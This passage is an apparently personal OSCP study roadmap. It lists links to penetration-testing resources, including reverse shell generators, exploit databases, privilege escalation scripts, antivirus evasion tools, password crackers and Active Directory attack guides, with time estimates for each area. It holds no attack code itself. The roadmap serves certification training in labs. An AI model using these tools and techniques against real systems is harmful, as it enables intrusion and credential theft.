https://github.com/epi052/recursive-gobuster wfuzz — https://github.com/xmendez/wfuzz goWAPT — https://github.com/dzonerzy/goWAPT ffuf — https://github.com/ffuf/ffuf Nikto — https://github.com/sullo/nikto dirb — https://tools.kali.org/web-applications/dirb dirbuster — https://tools.kali.org/web-applications/dirbuster feroxbuster — https://github.com/epi052/feroxbuster FinalRecon — https://github.com/thewhiteh4t/FinalRecon ``` - Network tools: ``` Impacket (SMB, psexec, etc) — https://github.com/SecureAuthCorp/impacket ``` - File Transfers: ``` updog — https://github.com/sc0tfree/updog ``` - Wordlists: ``` SecLists — https://github.com/danielmiessler/SecLists ``` - Payload Generators: ``` Reverse Shell Generator — https://github.com/cwinfosec/revshellgen Windows Reverse Shell Generator — https://github.com/thosearetheguise/rev MSFVenom Payload Creator — https://github.com/g0tmi1k/msfpc ``` - Php reverse shell: ``` Windows PHP Reverse Shell — https://github.com/Dhayalanb/windows-php-reverse-shell PenTestMonkey Unix PHP Reverse Shell — http://pentestmonkey.net/tools/web-shells/php-reverse-shell ``` - Terminal Related: ``` tmux — https://tmuxcheatsheet.com/ (cheat sheet) tmux-logging — https://github.com/tmux-plugins/tmux-logging Oh My Tmux — https://github.com/devzspy/.tmux screen — https://gist.github.com/jctosta/af918e1618682638aa82 (cheat sheet) Terminator — http://www.linuxandubuntu.com/home/terminator-a-linux-terminal-emulator-with-multiple-terminals-in-one-window vim-windir — https://github.com/jtpereyda/vim-windir ``` - Exploits: ``` Exploit-DB — https://www.exploit-db.com/ Windows Kernel Exploits — https://github.com/SecWiki/windows-kernel-exploits AutoNSE — https://github.com/m4ll0k/AutoNSE Linux Kernel Exploits — https://github.com/lucyoa/kernel-exploits ``` - Password Brute Forcer: ``` BruteX — https://github.com/1N3/BruteX Hashcat — https://hashcat.net/hashcat/ John the Ripper — https://www.openwall.com/john/ ``` - Post Exploitation / Privilege Escalation ``` LinEnum — https://github.com/rebootuser/LinEnum linprivchecker —https://www.securitysift.com/download/linuxprivchecker.py Powerless — https://github.com/M4ximuss/Powerless PowerUp — https://github.com/HarmJ0y/PowerUp Linux Exploit Suggester — https://github.com/mzet-/linux-exploit-suggester Windows Exploit Suggester — https://github.com/bitsadmin/wesng Windows Privilege Escalation Awesome Scripts (WinPEAS) — https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS CHECK THE VERSION NUMBER!!! Linux Privilege Escalation Awesome Script (LinPEAS) — https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS GTFOBins (Bypass local restrictions) — https://gtfobins.github.io/ Get GTFOBins — https://github.com/CristinaSolana/ggtfobins sudo_killer — https://github.com/TH3xACE/SUDO_KILLER WADComs — https://wadcoms.github.io/ LOLBAS — https://lolbas-project.github.io/ ``` - Buffer Overflow Practice ``` Vulnserver for Windows — https://github.com/stephenbradshaw/vulnserver Vulnserver for Linux — https://github.com/ins1gn1a/VulnServer-Linux Tib3rius TryHackMe BOF — https://tryhackme.com/jr/bufferoverflowprep ``` - Privilege Escalation Practice ``` Local Privilege Escalation Workshop — https://github.com/sagishahar/lpeworkshop Linux Privilege Escalation — https://www.udemy.com/course/linux-privilege-escalation/ Windows Privilege Escalation — https://www.udemy.com/course/windows-privilege-escalation/ ``` > - Netcat > - [Netcat tutorial by networkchuk](https://youtu.be/bXCeFPNWjsM) > - [PowerShell Learning Resources](https://docs.microsoft.com/en-us/powershell/scripting/learn/more-powershell-learning?view=powershell-7) > - [PowerShell for Pentesting In Kali Linux](https://www.offensive-security.com/offsec/kali-linux-powershell-pentesting/) > - Hands on Challenges for learning PowerShell: > - underthewire.tech: https://underthewire.tech/wargames.htm > - codewars: https://www.codewars.com/ ``` Expected Tools Overview: 12 hours ``` ## 𝐁𝐚𝐬𝐡 𝐒𝐜𝐫𝐢𝐩𝐭𝐢𝐧𝐠 > - Practice: > - [Bash Scripting Practice on Hackerrank](https://www.hackerrank.com/domains/shell?filters%5Bstatus%5D%5B%5D=unsolved&filters%5Bstatus%5D%5B%5D=solved&filters%5Bsubdomains%5D%5B%5D=bash) > - https://www.learnshell.org/ > - Book: > - [Shell Scripting: How to Automate Command Line Tasks Using...](https://g.co/kgs/LW4kQy) ``` Expected Time: 4 hours ``` ## 𝐏𝐚𝐬𝐬𝐢𝐯𝐞 𝐈𝐧𝐟𝐨𝐫𝐦𝐚𝐭𝐢𝐨𝐧 𝐆𝐚𝐭𝐡𝐞𝐫𝐢𝐧𝐠 ``` - Website Recon - Whois Enumeration - Google hacking : https://www.exploit-db.com/google-hacking-database - Netcraft - Recon-ng : https://github.com/lanmaster53/recon-ng - Open source code - Shodan - Security Headers Scanner - SSL Server Test - Pastebin - User information Gathering - Email Harvesting - Stack Overflow - OSINT Framework - Maltego ``` ``` Expected time: 30 mins ``` ## 𝐀𝐜𝐭𝐢𝐯𝐞 𝐈𝐧𝐟𝐨𝐫𝐦𝐚𝐭𝐢𝐨𝐧 𝐆𝐚𝐭𝐡𝐞𝐫𝐢𝐧𝐠 ``` - DNS Enumeration - Forward Lookup - Reverse Lookup - DNS Zone Transfers - Tools: - DNSrecon - DNSenum - Port Scanning - TCP Scanning - UDP Scanning - Nmap: - https://nmap.org/book/toc.html - https://www.amazon.com/Nmap-Network-Scanning-Official-Discovery/dp/0979958717 - https://blog.zsec.uk/nmap-rtfm/ - Masscan - SMB Enumeration - NFS Enumeration - SMTP Enumeration - SNMP Enumeration ``` ``` Expected Time: 12 hours ``` ## 𝐕𝐮𝐥𝐧𝐞𝐫𝐚𝐛𝐢𝐥𝐢𝐭𝐲 𝐒𝐜𝐚𝐧𝐧𝐢𝐧𝐠 ``` - Vulnerability Scanning using Nessus - Vulnerability Scanning using Nmap ``` ``` Expected Time: 4 hours ``` ## 𝐖𝐞𝐛 𝐀𝐩𝐩𝐥𝐢𝐜𝐚𝐭𝐢𝐨𝐧 𝐀𝐭𝐭𝐚𝐜𝐤𝐬 - Web Tools: ``` - DIRB: http://dirb.sourceforge.net/ - Dirsearch: https://github.com/maurosoria/dirsearch - Dirbuster: https://tools.kali.org/web-applications/dirbuster - Gobuster: https://github.com/OJ/gobuster - Wfuzz: https://github.com/xmendez/wfuzz - ffuf: https://github.com/ffuf/ffuf - Burpsuite - Nikto - HTTPIe https://httpie.io/ ``` - Practice: > - Metasploitable 2 > - OWASP Juice Shop > - Overthewire Natas > - Web Security Academy > - https://www.hackthissite.org/ ``` Expected Time: 30 days ``` ## 𝐁𝐮𝐟𝐟𝐞𝐫 𝐎𝐯𝐞𝐫𝐟𝐥𝐨𝐰 - Blogs: > - [Buffer Overflows Made Easy](https://tcm-sec.com/buffer-overflows-made-easy/) > - [Exploit writing tutorial part 1 : Stack Based Overflows](https://web.archive.org/web/20220228234520/https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/) > - [Exploit writing tutorial part 2 : Stack Based Overflows – jumping to shellcode](https://web.archive.org/web/20220228234628/https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/) > - [What is Buffer Overflow? — TryHackMe: Buffer Overflow Prep Walkthrough](https://ahoner.medium.com/what-is-buffer-overflow-tryhackme-buffer-overflow-prep-walkthrough-9e2629a6b5b9) > - [Buffer Overflow personal cheatsheet](https://liodeus.github.io/2020/08/11/bufferOverflow.html) > - [Easy OSCP Bufferoverflow Preparation](https://hum4ng0d.github.io/OSCP-Easy-Bufferoverflow/) > - [The Braindead Buffer Overflow Guide to Pass the OSCP Blindfolded](https://boschko.ca/braindead-buffer-overflow-guide-to-pass-the-oscp-blindfolded/) > - [Simplifying Buffer Overflows for OSCP](https://appsecradar.net/posts/simplifying-buffer-overflows-for-oscp/) > - [OSCP Buffer Overflow Guide (Windows)](https://alomancy.gitbook.io/guides/guides/bof) > - Practice: ``` 1. https://tryhackme.com/room/oscpbufferoverflowprep 2. protostar on vulnhub 3. vulnserver 4. Brainpan on vulnhub 5. warFTP 6. miniserv 7. https://overthewire.org/wargames/behemoth/ 8. https://overthewire.org/wargames/narnia/ 9. Brainpan 1: https://www.vulnhub.com/entry/brainpan-1,51/ 10. Pinky’s Palace version 1: https://www.vulnhub.com/entry/pinkys-palace-v1,225/ 11. Stack Overflows for Beginners: https://www.vulnhub.com/entry/stack-overflows-for-beginners-101,290/ 12. SmashTheTux: https://www.vulnhub.com/entry/smashthetux-101,138/ 13. Pandora’s Box: https://www.vulnhub.com/entry/pandoras-box-1,111/ ``` - Windows Binaries (Recommend that you run these on Windows 7/XP 32 bit): ``` Vulnserver: https://samsclass.info/127/proj/vuln-server.htm Minishare 1.4.1: https://www.exploit-db.com/exploits/636 Savant Web Server 3.1: https://www.exploit-db.com/exploits/10434 Freefloat FTP Server 1.0: https://www.exploit-db.com/exploits/40673 Core FTP Server 1.2: https://www.exploit-db.com/exploits/39480 WarFTP 1.65: https://www.exploit-db.com/exploits/3570 VUPlayer 2.4.9: https://www.exploit-db.com/exploits/40018 ``` - Linux Binaries ``` Linux Buffer Overflow: https://samsclass.info/127/proj/lbuf1.htm ``` - Videos: > - [Buffer Overflows made easy](https://www.youtube.com/playlist?list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G) > - [Buffer Overflows made easy (2022 Edition)](https://youtu.be/ncBblM920jw) > - [Basic Buffer Overflow - VulnServer TRUN](https://youtu.be/yJF0YPd8lDw) > - [Stack Based Buffer Overflow Prep](https://youtu.be/1X2JGF_9JGM) > - [OSCP Prep - x86 Windows Stack-Based Buffer Overflow Full Tutorial - War-FTP 1.65](https://youtu.be/Z2pQuGmFNrM) > - [Buffer Overflow Prep (feat. Tib3rius and TryHackMe)](https://youtu.be/bBBaVQjjSLQ) - Github: ``` 1. https://github.com/justinsteven/dostackbufferoverflowgood 2. https://github.com/3isenHeiM/OSCP-BoF 3. https://github.com/gh0x0st/Buffer_Overflow 4. https://github.com/sradley/overflow (You should not use it in the exam) 5. https://github.com/onecloudemoji/BOF-Template (Buffer overflow template) 6. https://github.com/V1n1v131r4/OSCP-Buffer-Overflow ``` - Other Resources: ``` Whitepaper Introduction to Immunity Debugger: https://www.sans.org/reading-room/whitepapers/malicious/basic-reverse-engineering-immunity-debugger-36982 Do Stack Buffer Overflow Good: https://github.com/justinsteven/dostackbufferoverflowgood Buffer Overflows for Dummies: https://www.sans.org/reading-room/whitepapers/threats/buffer-overflows-dummies-481 Vortex Stack Buffer Overflow Practice: https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/ Smashing the Stack For Fun and Profit: http://www-inst.eecs.berkeley.edu/~cs161/fa08/papers/stack_smashing.pdf Buffer Overflow Guide: https://github.com/johnjhacking/Buffer-Overflow-Guide Stack based Linux Buffer Overflow: https://www.exploit-db.com/docs/english/28475-linux-stack-based-buffer-overflows.pdf ``` ``` Expected time (without practice): 8 hours ``` ## 𝐂𝐥𝐢𝐞𝐧𝐭-𝐬𝐢𝐝𝐞 𝐀𝐭𝐭𝐚𝐜𝐤𝐬 ``` https://www.offensive-security.com/metasploit-unleashed/client-side-attacks/ ``` ``` Expected Time: (not sure) ``` ## 𝐋𝐨𝐜𝐚𝐭𝐢𝐧𝐠 𝐏𝐮𝐛𝐥𝐢𝐜 𝐄𝐱𝐩𝐥𝐨𝐢𝐭𝐬 - Places to Find Exploits: > - https://www.exploit-db.com/ > - https://packetstormsecurity.com/files/tags/exploit/ > - https://www.securityfocus.com/ - Tools for finding exploits: ``` Searchsploit: a command line search tool for Exploit-DB Nmap NSE Script The Browser Exploitation Framework (BeEF) Manual for searchsploit: https://www.exploit-db.com/searchsploit ``` ``` Expected Time: 1 hour ``` ## 𝐀𝐧𝐭𝐢𝐯𝐢𝐫𝐮𝐬 𝐄𝐯𝐚𝐬𝐢𝐨𝐧 - Book ``` Antivirus Bypass Techniques: Learn Practical Techniques and Tactics to Combat, Bypass, and Evade Antivirus Software Link: https://g.co/kgs/WzEjAH ``` - Tools to play with Anti-Virus evasion: ``` Veil-Framework: https://github.com/Veil-Framework/Veil Shellter: https://www.shellterproject.com/ Unicorn https://github.com/trustedsec/unicorn UniByAV: https://github.com/Mr-Un1k0d3r/UniByAv ``` - Tools to play with for Obfuscation: ``` PowerShell: Invoke-Obfuscation: https://github.com/danielbohannon/Invoke-Obfuscation Chimera: https://github.com/tokyoneon/Chimera Python: Pyarmor: https://pypi.org/project/pyarmor/ PyObfx: https://github.com/PyObfx/PyObfx C#: ConfuserEx: https://github.com/yck1509/ConfuserEx ``` - Testing Payloads Publicly. (Keep in mind that submitting your samples to online scanners may be distributed to other AV engines): ``` Nodistribute: https://nodistribute.com/ Virustotal: https://www.virustotal.com/gui/home Hybrid-Analysis: https://www.hybrid-analysis.com/ Any-Run: https://app.any.run Reverse.it: https://reverse.it Anti-Virus Evasion Tool: https://github.com/govolution/avet DefenderCheck: https://github.com/matterpreter/DefenderCheck ThreatCheck: https://github.com/rasta-mouse/ThreatCheck ``` ``` Expected: 12 hours ``` ## 𝐏𝐫𝐢𝐯𝐢𝐥𝐞𝐠𝐞 𝐄𝐬𝐜𝐚𝐥𝐚𝐭𝐢𝐨𝐧 - Blogs: > - [Windows elevation of privileges](https://guif.re/windowseop) > - [Linux elevation of privileges](https://guif.re/linuxeop) > - [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) > - [Checklist - Local Windows Privilege Escalation](https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation) > - [Linux Privilege Escalation](https://book.hacktricks.xyz/linux-unix/privilege-escalation) > - [Linux](https://guide.offsecnewbie.com/privilege-escalation/linux-pe) > - [Linux Privilege Escalation Exploiting Capabilities](https://steflan-security.com/linux-privilege-escalation-exploiting-capabilities/) > - [I absolutely suck at privilege escalation](https://www.reddit.com/r/oscp/comments/9ystub/i_absolutely_suck_at_privilege_escalation/) > - [Privilege escalations in windows](https://infosecwriteups.com/privilege-escalation-in-windows-380bee3a2842) > - [Windows Privilege Escalation Guide](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/) > - [Hacking Linux Part I: Privilege Escalation](http://www.dankalia.com/tutor/01005/0100501004.htm) > - [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) > - [Windows Privilege Escalation Methods for Pentesters](https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/) > - [Windows Services - All roads lead to SYSTEM](https://labs.f-secure.com/archive/windows-services-all-roads-lead-to-system/) > - [I hate hate hate HATEE privilege escalation.](https://www.reddit.com/r/oscp/comments/iclvle/i_hate_hate_hate_hatee_privilege_escalation_did/) - Practice: > - https://gtfobins.github.io/ > - https://lolbas-project.github.io/ > - https://forum.hackthebox.com/t/oscp-practice/531 - Videos/Courses > - https://www.udemy.com/course/linux-privilege-escalation/ > - Tiberius and TCM udemy courses > - [OSCP - Windows Privilege Escalation Methodology](https://www.youtube.com/watch?v=Qfy-traJwIs) > - [Encyclopaedia Of Windows Privilege Escalation - Brett Moore](https://youtu.be/kMG8IsCohHA) > - [DerbyCon 3 0 2105 Windows Attacks At Is The New Black Rob Fuller And Chris Gates](https://youtu.be/_8xJaaQlpBo) > - [Privilege Escalation](https://www.youtube.com/playlist?list=PLDrNMcTNhhYrBNZ_FdtMq-gLFQeUZFzWV) > - [Ippsec](https://www.youtube.com/c/ippsec) - Github: ``` 1. https://github.com/sagishahar/lpeworkshop 2. https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Methodology%20and%20Resources 3. https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md 4. https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md 5. https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md 6. https://github.com/abatchy17/WindowsExploits 7. https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc 8. https://github.com/rasta-mouse/Sherlock 9. https://github.com/AonCyberLabs/Windows-Exploit-Suggester ``` - Others ``` - https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS - https://in.security/lin-security-practise-your-linux-privilege-escalation-foo/ - https://www.vulnhub.com/entry/linsecurity-1,244/ - https://www.netsecfocus.com/oscp/2021/05/06/The_Journey_to_Try_Harder-_TJnull-s_Preparation_Guide_for_PEN-200_PWK_OSCP_2.0.html#section-10-buffer-overflows-for-windows-and-linux - http://pwnwiki.io/#!privesc/windows/index.md - https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ - https://github.com/N7WEra/SharpAllTheThings - https://github.com/411Hall/JAWS/commits?author=411Hall - https://github.com/bitsadmin/wesng - https://github.com/rasta-mouse/Sherlock - https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS - https://github.com/rasta-mouse/Watson - https://github.com/GhostPack/Seatbelt - https://github.com/gladiatx0r/Powerless - https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon - https://github.com/breenmachine/RottenPotatoNG - https://github.com/ohpe/juicy-potato - https://rahmatnurfauzi.medium.com/windows-privilege-escalation-scripts-techniques-30fa37bd194 - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ - https://github.com/jondonas/linux-exploit-suggester-2 ``` ``` Expected: 12 hours ``` ## 𝐏𝐚𝐬𝐬𝐰𝐨𝐫𝐝 𝐀𝐭𝐭𝐚𝐜𝐤𝐬 - Offline tools for password cracking ``` Hashcat: https://hashcat.net/hashcat/ Sample Hashes to test with Hashcat: https://hashcat.net/wiki/doku.php?id=example_hashes John the Ripper: https://www.openwall.com/john/ Metasploit Unleashed using John the Ripper with Hashdump: https://www.offensive-security.com/metasploit-unleashed/john-ripper/ ``` - Online Tools for password cracking ``` THC Hydra: https://github.com/vanhauser-thc/thc-hydra Crowbar: https://github.com/galkan/crowbar ``` - Wordlist Generator ``` Cewl: https://digi.ninja/projects/cewl.php Crunch: https://tools.kali.org/password-attacks/crunch Cupp (In Kali Linux): https://github.com/Mebus/cupp ``` - Tools to check the hash type: ``` Hash-Identifier: https://github.com/psypanda/hashID ``` - Tools to dump for hashes: ``` Mimikatz: https://github.com/gentilkiwi/mimikatz Mimipenguin: https://github.com/huntergregal/mimipenguin Pypykatz: https://github.com/skelsec/pypykatz ``` - Wordlists: ``` In Kali: /usr/share/wordlists Seclists: apt-get install seclists You can find all of his password lists here: https://github.com/danielmiessler/SecLists/tree/master/Passwords Xajkep Wordlists: https://github.com/xajkep/wordlists ``` - Online Password Crackers: ``` https://hashkiller.io/ https://www.cmd5.org/ https://www.onlinehashcrack.com/ https://gpuhash.me/ https://crackstation.net/ https://passwordrecovery.io/ https://md5decrypt.net/en/ https://hashes.com/en/decrypt/hash http://cracker.offensive-security.com/ ``` - Others ``` Introduction to Password Cracking: https://alexandreborgesbrazil.files.wordpress.com/2013/08/introduction_to_password_cracking_part_1.pdf Pwning Wordpress Passwords: https://medium.com/bugbountywriteup/pwning-wordpress-passwords-2caf12216956 ``` ``` Expected: 12 hours ``` ## 𝐏𝐨𝐫𝐭 𝐑𝐞𝐝𝐢𝐫𝐞𝐜𝐭𝐢𝐨𝐧 𝐚𝐧𝐝 𝐓𝐮𝐧𝐧𝐞𝐥𝐢𝐧𝐠 - Blogs > - [Proxytunnels](https://www.offensive-security.com/metasploit-unleashed/proxytunnels/) > - [Portfwd](https://www.offensive-security.com/metasploit-unleashed/portfwd/) > - [Explore Hidden Networks with double pivoting](https://pentest.blog/explore-hidden-networks-with-double-pivoting/) > - [Tunneling and pivoting](https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html) > - [Port Forwarding: A practical hands on guide](https://www.abatchy.com/2017/01/port-forwarding-practical-hands-on-guide) > - [Configuring Port Forwarding on Windows](http://woshub.com/port-forwarding-in-windows/) > - [SSH Tunneling Explained](https://chamibuddhika.wordpress.com/2012/03/21/ssh-tunnelling-explained/) - Tools ``` Proxychains: https://github.com/haad/proxychains Proxychains-ng: https://github.com/rofl0r/proxychains-ng SSHuttle (Totally Recommend learning this): https://github.com/sshuttle/sshuttle SSHuttle Documentation: https://sshuttle.readthedocs.io/en/stable/ Chisel https://github.com/jpillora/chisel Ligolo: https://github.com/sysdream/ligolo ``` - Online Tunneling Services ``` Ngrok: https://ngrok.com/ Twilo: https://www.twilio.com/ ``` - Practice ``` Wintermute: https://www.vulnhub.com/entry/wintermute-1,239/ ``` ``` Expected: 12 hours ``` ## 𝐀𝐜𝐭𝐢𝐯𝐞 𝐃𝐢𝐫𝐞𝐜𝐭𝐨𝐫𝐲 𝐀𝐭𝐭𝐚𝐜𝐤𝐬 - Blogs > - [Attack this active directory machine and get your 40 points!](https://www.reddit.com/r/oscp/comments/s5puw0/attack_this_active_directory_machine_and_get_your/) > - [[AD 0] Setting up an Active Directory Lab](https://shroudri.github.io/guides/setting-up-active-directory/) > - [Attacking Active Directory: 0 to 0.9](https://zer1t0.gitlab.io/posts/attacking_ad/) - Github: > - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md > - https://github.com/davidprowe/BadBlood > - https://github.com/avi7611/Active-directory-small-cheatsheet - Practice: ``` - https://tryhackme.com/room/attacktivedirectory - https://tryhackme.com/network/throwback - Heist, Hutch, Vault on PG Play - Tryhackme Holo, Throwback networks in addition to attacktive and post exploitation rooms - Hackthebox: Forest, Sauna, dante, active, Arctic and Granny. - CyberSecLabs - Razorblack, Enterprise, VulnNet - Active on tryhackme - wreath on tryhackme - blackfield, intelligence, multimaster, cascade, heist...crap was that htb heist or pg heist or both, Reel, Sauna, Fuse, Sizzle, Mantis, and Resolute. - https://drive.google.com/file/d/1RktnrenlhOMIqdPDAv-u60_yzW7K0KS0/view - Rastalabs on HTB ``` - Videos: > - [Kerberos & Attacks 101](https://www.youtube.com/watch?v=IBeUz7zMN24) > - [Active Directory Attack Series](https://youtube.com/playlist?list=PLPDUz8KkxR5z2z84CJ1JyLXC9JgxkjPBk) > - [Attacking Active Directory - GPP Credentials](https://www.youtube.com/watch?v=sTedpt47t2Y) > - [70-640 Active Directory Course](https://youtube.com/playlist?list=PL1l78n6W8zypXtkh3uWIXbPssc4IGbfb5) > - [Common Active Directory Attacks: Back to the Basics of Security Practices](https://youtu.be/vga7A2tYejE) > - [What is Active Directory](https://youtu.be/GfqsFtmJQg0) - TJNull's suggestion: ``` Setting up Active Directory: Note: Make sure when you are setting up the Active Directory Server that you assign a static IP address to it and also a workstation that you will be joining the server to for further testing. I recommend that you set up a Windows 10 Workstation if you plan to use Windows Server 2016/2019. Microsoft Documentation to install Active Directory: https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/deploy/install-active-directory-domain-services–level-100- Install Windows Active Directory on Windows Server 2019: https://computingforgeeks.com/how-to-install-active-directory-domain-services-in-windows-server/ Understanding Users Accounts in Active Directory: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts Three ways to create an Active Directory User: https://petri.com/3-ways-to-create-new-active-directory-users Join a Workstation to the Domain: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/join-a-computer-to-a-domain Tools to help you automate the installation for Active Directory: ADLab: https://github.com/browninfosecguy/ADLab Automated Lab: https://github.com/AutomatedLab/AutomatedLab MSLab: https://github.com/microsoft/MSLab Invoke-ADLabDeployer: https://github.com/outflanknl/Invoke-ADLabDeployer Active Directory User Setup: https://github.com/bjiusc/Active-Directory-User-Setup-Script Enumerating Active Directory: Active Directory Enumeration with Powershell: https://www.exploit-db.com/docs/english/46990-active-directory-enumeration-with-powershell.pdf Active Directory Exploitation Cheat Sheet: https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#domain-enumeration Powersploit: https://github.com/PowerShellMafia/PowerSploit Understanding Authentication protocols that Active Directory Utilizes: NTLM Authentication: https://docs.microsoft.com/en-us/windows-server/security/kerberos/kerberos-authentication-overview Kerberos Authentication https://docs.microsoft.com/en-us/windows-server/security/kerberos/kerberos-authentication-overview Cache and Stored Credentials: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11) Group Managed Service Accounts: https://adsecurity.org/?p=4367 Lateral Movement in Active Directory: Paving the Way to DA: https://blog.zsec.uk/path2da-pt1 Part 2, 3 Pass the Hash with Machine Accounts: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/pass-the-hash-with-machine-accounts Overpass the hash (Payload All the things): https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#overpass-the-hash-pass-the-key Red Team Adventures Overpass the Hash: https://riccardoancarani.github.io/2019-10-04-lateral-movement-megaprimer/#overpass-the-hash Pass the Ticket (Silver Tickets): https://adsecurity.org/?p=2011 Lateral Movement with DCOM: https://www.ired.team/offensive-security/lateral-movement/t1175-distributed-component-object-model Active Directory Persistence: Cracking Kerberos TGS Tickets Using Kerberoast: https://adsecurity.org/?p=2293 Kerberoasting Without Mimikatz: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/ Golden Tickets: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets Pass the Ticket (Golden Tickets): https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#pass-the-ticket-golden-tickets Understanding DCSync Attacks: https://attack.stealthbits.com/privilege-escalation-using-mimikatz-dcsync Tools for Active Directory Lateral Movement and Persistence: ADRecon: https://github.com/sense-of-security/ADRecon Kerbrute: https://github.com/ropnop/kerbrute Rubeus: https://github.com/GhostPack/Rubeus Impacket: https://github.com/SecureAuthCorp/impacket Other Resources: Building an Active Directory with PowerShell: https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell/ Lateral Movement for AD: https://riccardoancarani.github.io/2019-10-04-lateral-movement-megaprimer/#overpass-the-hash Lateral Movement with CrackMapExec: https://www.hackingarticles.in/lateral-moment-on-active-directory-crackmapexec/ ``` - Others: ``` - https://wadcoms.github.io/ - https://www.xmind.net/m/5dypm8/ - Cybermentor's Practical Ethical Hacking Course - Active Directory Section ``` ``` Expected: 48 hours ``` ## 𝐓𝐡𝐞 𝐌𝐞𝐭𝐚𝐬𝐩𝐥𝐨𝐢𝐭 𝐅𝐫𝐚𝐦𝐞𝐰𝐨𝐫𝐤 > - Metasploit Unleashed: https://www.offensive-security.com/metasploit-unleashed/ > - Book: > - [Metasploit: The Penetration Tester's Guide](https://g.co/kgs/Cpu7s9) - MSFvenom Cheat Sheets: ``` http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/ https://netsec.ws/?p=331 https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom ``` ``` Expected: 4 hours ``` ## 𝐏𝐨𝐰𝐞𝐫𝐬𝐡𝐞𝐥𝐥 𝐄𝐦𝐩𝐢𝐫𝐞 > - Powershell Empire: https://github.com/BC-SECURITY/Empire > - Powershell Empire Guide: https://alpinesecurity.com/blog/empire-a-powershell-post-exploitation-tool/ ``` Expected: 4 hours ``` ## 𝐓𝐫𝐲𝐢𝐧𝐠 𝐇𝐚𝐫𝐝𝐞𝐫: 𝐓𝐡𝐞 𝐋𝐚𝐛𝐬 - HTB VM List: https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159 - Vulnhub VM List: https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0 # 𝐒𝐭𝐫𝐚𝐭𝐞𝐠𝐲 - Overview: ``` Phase I: Theory, Preparation and Note Taking Phase II: Practice Phase III: OSCP Labs & Origial Course Material Phase IV: OSCP Exam ``` ``` Thought Process: So, Yeah! We have 180 days i.e. 175 remaining. I took a lot of time planning, it's ok tho. One shot, game khallas karna hai. Let's plan: Let's divide OSCP into fundamental components that will require for us to crack OSCP: 1. Theory, theory and theory. In-depth Understanding of lot of topics. 2. Ability to apply knowledge practically. 3. Critical Thinking 4. High Pain threshold. 5. Consistency 6. Note taking Step by step dekha jaye toh, you should have basic understanding of almost everything beforehand so that you don't keep jumping back on phase I from phase II. Do theory, make notes and refer to notes. Have everything at one place! That's it for today, hehe! ``` - [Study Methodology](https://www.reddit.com/r/intj/comments/savbmb/study_tips_from_an_intj_to_an_intj/)
